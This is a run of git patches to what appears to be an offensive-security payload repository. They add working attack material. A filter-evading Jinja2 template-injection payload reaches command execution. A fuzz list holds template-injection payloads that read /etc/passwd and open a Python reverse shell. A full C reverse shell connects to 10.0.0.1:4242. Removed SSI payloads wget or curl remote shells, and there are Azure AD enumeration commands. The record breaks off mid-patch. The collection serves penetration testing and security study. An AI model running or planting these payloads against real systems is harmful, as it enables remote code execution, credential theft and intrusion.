 Server Side Template Injection/README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 79c2a9f..4544769 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -368,6 +368,11 @@ Bypassing `|join`
 http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
 ```
 
+Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'):
+```python
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+```
+
 ## Jinjava
 
 ### Basic injection

From 7e7f5e762831266b22531c258d628172c7038bb9 Mon Sep 17 00:00:00 2001
From: chiv <gus@outlook.at>
Date: Mon, 13 Apr 2020 18:48:43 +0100
Subject: [PATCH 25/85] Added SSTI RCE bypass payload for Jinja2

---
 Server Side Template Injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 4544769..2c35f22 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -368,7 +368,7 @@ Bypassing `|join`
 http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
 ```
 
-Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'):
+Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
 ```python
 {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
 ```

From af6760ef7a6bf0630866f7f0ffcd8dddfd0cfaa6 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 17 Apr 2020 16:34:51 +0200
Subject: [PATCH 26/85] RoadRecon + JSON None refs

---
 JSON Web Token/README.md                         |  1 +
 .../Active Directory Attack.md                   |  3 ++-
 .../Cloud - Azure Pentest.md                     | 16 +++++++++++++++-
 3 files changed, 18 insertions(+), 2 deletions(-)

diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index c4063d8..e186299 100644
--- a/JSON Web Token/README.md	
+++ b/JSON Web Token/README.md	
@@ -279,3 +279,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
 - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
+- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
\ No newline at end of file
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 0da35ca..ce4d6d8 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -1570,4 +1570,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 6b3723410a3c5
 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
 * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
 * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
-* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
\ No newline at end of file
+* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)
+* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
\ No newline at end of file
diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index 26548db..9c4d692 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -172,6 +172,19 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest
 
 ## Azure AD - Enumeration
 
+> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph.
+
+```powershell
+$ git clone https://github.com/dirkjanm/ROADtools
+$ pip install roadrecon
+$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
+$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
+$ roadrecon dump
+$ roadrecon gui
+```
+
+Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD
+
 ```powershell
 PS C:\> git clone https://github.com/adrecon/AzureADRecon.git
 PS C:\> Install-Module -Name AzureAD
@@ -429,4 +442,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
 * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
 * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
 * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
-* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
\ No newline at end of file
+* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
+* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
\ No newline at end of file

From 1d8414c703d09727c80317cce259df9d77a5bd4d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 18 Apr 2020 21:18:22 +0200
Subject: [PATCH 27/85] ASP.NET Razor SSTI

---
 Server Side Template Injection/README.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 49c4b93..5998047 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -41,6 +41,9 @@
 * [Jinjava](#jinjava)
   * [Basic injection](#basic-injection)
   * [Command execution](#command-execution)
+* [ASP.NET Razor](#aspnet-razor)
+  * [Basic injection](#basic-injection)
+  * [Command execution](#command-execution)
 * [References](#references)
 
 ## Tools
@@ -418,6 +421,21 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 ```
 
+## ASP.NET Razor
+
+### Basic injection
+
+```powershell
+@(1+2)
+```
+
+### Command execution 
+
+```csharp
+@{
+  // C# code
+}
+```
 
 ## References
 
@@ -434,3 +452,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
 * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
 * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
+* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
\ No newline at end of file

From ade039c1bc0342a0edd557bb7a9caf178badd8a3 Mon Sep 17 00:00:00 2001
From: Techbrunch <Techbrunch@users.noreply.github.com>
Date: Tue, 21 Apr 2020 10:49:47 +0200
Subject: [PATCH 28/85] Add insomnia to GraphQL list of tools

---
 GraphQL Injection/README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 725bee0..4c750a3 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -26,6 +26,7 @@
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
 * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
+* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
 
 ## Exploit
 
@@ -291,4 +292,4 @@ mutation finishChannelVerificationMutation(
 * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
 * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
 * [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
-* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
\ No newline at end of file
+* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)

From 95fed140ecdd652309fc312c04a18f1c3b42142b Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 21 Apr 2020 11:13:19 +0200
Subject: [PATCH 29/85] Fix - SSTI Payloads

---
 GraphQL Injection/README.md                   | 23 ++++++
 .../Intruder/JHADDIX_SSI_Injection.txt        | 75 -------------------
 .../Intruder/ssi_quick.txt                    | 18 -----
 .../Intruder/ssti.fuzz                        | 49 ++++++++++++
 4 files changed, 72 insertions(+), 93 deletions(-)
 delete mode 100644 Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt
 delete mode 100644 Server Side Template Injection/Intruder/ssi_quick.txt
 create mode 100644 Server Side Template Injection/Intruder/ssti.fuzz

diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 4c750a3..12734ff 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -24,6 +24,7 @@
 * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
 * [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
+* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
 * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
 * [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
@@ -155,6 +156,28 @@ query IntrospectionQuery {
 }
 ```
 
+### List path
+
+```php
+$ git clone https://gitlab.com/dee-see/graphql-path-enum
+$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
+Found 27 ways to reach the "Skill" node from the "Query" node:
+- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (query) -> Query (skills) -> Skill
+```
 
 ### Extract data
 
diff --git a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt b/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt
deleted file mode 100644
index 9b7ba08..0000000
--- a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt	
+++ /dev/null
@@ -1,75 +0,0 @@
-<pre><!--#exec cmd="ls" --></pre>
-<pre><!--#echo var="DATE_LOCAL" --> </pre>
-<pre><!--#exec cmd="whoami"--></pre>
-<pre><!--#exec cmd="dir" --></pre>
-<!--#exec cmd="ls" -->
-<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
-<!--#exec cmd="/bin/ls /" -->
-<!--#exec cmd="dir" -->
-<!--#exec cmd="cd C:\WINDOWS\System32">
-<!--#config errmsg="File not found, informs users and password"-->
-<!--#echo var="DOCUMENT_NAME" -->
-<!--#echo var="DOCUMENT_URI" -->
-<!--#config timefmt="A %B %d %Y %r"-->
-<!--#fsize file="ssi.shtml" -->
-<!--#include file=?UUUUUUUU...UU?-->
-<!--#echo var="DATE_LOCAL" --> 
-<!--#exec cmd="whoami"--> 
-<!--#printenv -->
-<!--#flastmod virtual="echo.html" -->
-<!--#echo var="auth_type" -->
-<!--#echo var="http_referer" -->
-<!--#echo var="content_length" -->
-<!--#echo var="content_type" -->
-<!--#echo var="http_accept_encoding" -->
-<!--#echo var="forwarded" -->
-<!--#echo var="document_uri" -->
-<!--#echo var="date_gmt" -->
-<!--#echo var="date_local" -->
-<!--#echo var="document_name" -->
-<!--#echo var="document_root" -->
-<!--#echo var="from" -->
-<!--#echo var="gateway_interface" -->
-<!--#echo var="http_accept" -->
-<!--#echo var="http_accept_charset" -->
-<!--#echo var="http_accept_language" -->
-<!--#echo var="http_connection" -->
-<!--#echo var="http_cookie" -->
-<!--#echo var="http_form" -->
-<!--#echo var="http_host" -->
-<!--#echo var="user_name" -->
-<!--#echo var="unique_id" -->
-<!--#echo var="tz" -->
-<!--#echo var="total_hits" -->
-<!--#echo var="server_software" -->
-<!--#echo var="server_protocol" -->
-<!--#echo var="server_port" -->
-<!--#echo var="server_name -->
-<!--#echo var="server_addr" -->
-<!--#echo var="server_admin" -->
-<!--#echo var="script_url" -->
-<!--#echo var="script_uri" -->
-<!--#echo var="script_name" -->
-<!--#echo var="script_filename" -->
-<!--#echo var="netsite_root" -->
-<!--#echo var="site_htmlroot" -->
-<!--#echo var="path_translated" -->
-<!--#echo var="path_info_translated" -->
-<!--#echo var="request_uri" -->
-<!--#echo var="request_method" -->	
-<!--#echo var="remote_user" -->
-<!--#echo var="remote_addr" -->
-<!--#echo var="http_client_ip" -->
-<!--#echo var="remote_port" -->
-<!--#echo var="remote_ident" -->
-<!--#echo var="remote_host" -->
-<!--#echo var="query_string_unescaped" -->
-<!--#echo var="query_string" -->
-<!--#echo var="path_translated" -->
-<!--#echo var="path_info" -->
-<!--#echo var="path" -->
-<!--#echo var="page_count" -->
-<!--#echo var="last_modified" -->
-<!--#echo var="http_user_agent" -->
-<!--#echo var="http_ua_os" -->
-<!--#echo var="http_ua_cpu" -->
diff --git a/Server Side Template Injection/Intruder/ssi_quick.txt b/Server Side Template Injection/Intruder/ssi_quick.txt
deleted file mode 100644
index fef3ab2..0000000
--- a/Server Side Template Injection/Intruder/ssi_quick.txt	
+++ /dev/null
@@ -1,18 +0,0 @@
-</nowiki>
-<!--#echo var="DOCUMENT_NAME" -->
-<!--#echo var="DOCUMENT_URI" -->
-<!--#config timefmt="A %B %d %Y %r"-->
-<!--#echo var="DATE_LOCAL" -->
-<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
-<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
-<!--#include virtual="/" -->
-<!--#exec cmd="ls" -->
-<!--#exec cmd="whoami" -->
-<!--#exec cmd="uname" -->
-<!--#exec cmd="dir" -->
-<!--#exec cmd="cat /etc/passwd" -->
-<!--#exec cmd="ipconfig" -->
-<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
-<!--#exec cmd="perl -e 'print "X"*5000'" -->
-<!--#exec cmd="sleep 5" -->
-<!--#exec cmd="sleep 10" -->
diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz
new file mode 100644
index 0000000..ced385b
--- /dev/null
+++ b/Server Side Template Injection/Intruder/ssti.fuzz	
@@ -0,0 +1,49 @@
+
+{{4*4}}[[5*5]]
+{{7*7}}
+{{7*'7'}}
+<%= 7 * 7 %>
+${3*3}
+${{7*7}}
+@(1+2)
+#{3*3}
+#{ 7 * 7 }
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
+{{config.items()}}
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
+{{ ''.__class__.__mro__[2].__subclasses__() }}
+{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
+{{'a'.toUpperCase()}} 
+{{ request }}
+{{self}}
+<%= File.open('/etc/passwd').read %>
+<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
+{{app.request.query.filter(0,0,1024,{'options':'system'})}}
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
+{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+{$smarty.version}
+{php}echo `id`;{/php}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+${T(java.lang.System).getenv()}
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
\ No newline at end of file

From 89f906f7a8e8dd6311abaebfc19910cf0814acf3 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 21 Apr 2020 11:17:39 +0200
Subject: [PATCH 30/85] Fix issue - C reverse shell

---
 .../Reverse Shell Cheatsheet.md               | 36 +++++++++++++++++++
 .../Files/SSRF_expect.svg                     |  0
 .../Files/SSRF_url.svg                        |  0
 3 files changed, 36 insertions(+)
 rename {Server Side Template Injection => Server Side Request Forgery}/Files/SSRF_expect.svg (100%)
 rename {Server Side Template Injection => Server Side Request Forgery}/Files/SSRF_url.svg (100%)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 67d626f..63346eb 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -25,6 +25,7 @@
     * [NodeJS](#nodejs)
     * [Groovy](#groovy)
     * [Groovy Alternative 1](#groovy-alternative-1)
+    * [C](#c)
 * [Meterpreter Shell](#meterpreter-shell)
     * [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
     * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
@@ -294,6 +295,41 @@ Thread.start {
 }
 ```
 
+### C
+
+Compile with `gcc /tmp/shell.c --output csh && csh`
+
+```csharp
+#include <stdio.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+int main(void){
+    int port = 4242;
+    struct sockaddr_in revsockaddr;
+
+    int sockt = socket(AF_INET, SOCK_STREAM, 0);
+    revsockaddr.sin_family = AF_INET;       
+    revsockaddr.sin_port = htons(port);
+    revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");
+
+    connect(sockt, (struct sockaddr *) &revsockaddr, 
+    sizeof(revsockaddr));
+    dup2(sockt, 0);
+    dup2(sockt, 1);
+    dup2(sockt, 2);
+
+    char * const argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+
+    return 0;       
+}
+```
+
 ## Meterpreter Shell
 
 ### Windows Staged reverse TCP
diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Request Forgery/Files/SSRF_expect.svg
similarity index 100%
rename from Server Side Template Injection/Files/SSRF_expect.svg
rename to Server Side Request Forgery/Files/SSRF_expect.svg
diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Request Forgery/Files/SSRF_url.svg
similarity index 100%
rename from Server Side Template Injection/Files/SSRF_url.svg
rename to Server Side Request Forgery/Files/SSRF_url.svg

From c8c4a6e8a9a75688cd2a49f4605f40a77b576b25 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 21 Apr 2020 11:26:49 +0200
Subject: [PATCH 31/85] Fix issue #185

---
 SQL Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 25b035e..f57a4f7 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -288,6 +288,8 @@ tamper=name_of_the_tamper
 "&"
 "^"
 "*"
+'--'
+"--"
 " or ""-"
 " or "" "
 " or ""&"

From eaac0e748eabbf25d63a88d2d8c7e69f8b6677c0 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 21 Apr 2020 11:31:18 +0200
Subject: [PATCH 32/85] Fix issue #185

---
 SQL Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index f57a4f7..f3eeb33 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -290,6 +290,7 @@ tamper=name_of_the_tamper
 "*"
 '--'
 "--"
+'--' / "--"
 " or ""-"
 " or "" "
 " or ""&"

From 2740600a6b577bb570301b602fd4a93f6eac7090 Mon Sep 17 00:00:00 2001
From: Th1b4ud <thibaud.robin.develop@gmail.com>
Date: Tue, 21 Apr 2020 19:21:51 +0200
Subject: [PATCH 33/85] Alternative TTY method with /usr/bin/script

---
 .../Reverse Shell Cheatsheet.md                     | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 63346eb..a728c33 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -431,6 +431,19 @@ lua: os.execute('/bin/sh')
 - nmap: `!sh`
 - mysql: `! bash`
 
+Alternative TTY method
+
+```
+www-data@debian:/dev/shm$ su - user
+su: must be run from a terminal
+
+www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null
+www-data@debian:/dev/shm$ su - user
+Password: P4ssW0rD
+
+user@debian:~$ 
+```
+
 ## Fully interactive reverse shell on Windows
 The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals.
 

From c4af354d8f410caeebbe9dc5fc8172107cc8733b Mon Sep 17 00:00:00 2001
From: bohdansec <51418565+bohdansec@users.noreply.github.com>
Date: Wed, 22 Apr 2020 00:51:36 +0300
Subject: [PATCH 34/85] Update Cloudflare XSS bypasses

Add 3 bypasses by Bohdan Korzhynskyi. Update twitter
---
 XSS Injection/README.md | 22 +++++++++++++++++++++-
 1 file changed, 21 insertions(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 1fe1978..8b46e60 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:`
 
 ## Common WAF Bypass
 
